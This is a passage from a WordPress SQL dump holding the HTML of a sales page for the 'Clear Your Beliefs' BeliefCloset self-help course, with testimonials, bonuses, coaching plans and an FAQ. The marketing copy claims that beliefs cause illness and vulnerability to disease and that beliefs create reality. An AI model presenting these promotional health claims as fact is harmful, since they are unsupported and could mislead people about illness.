health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:19:36', '2014-06-17 19:19:36', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(923, 4194, '2014-06-17 14:18:42', '2014-06-17 19:18:42', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not 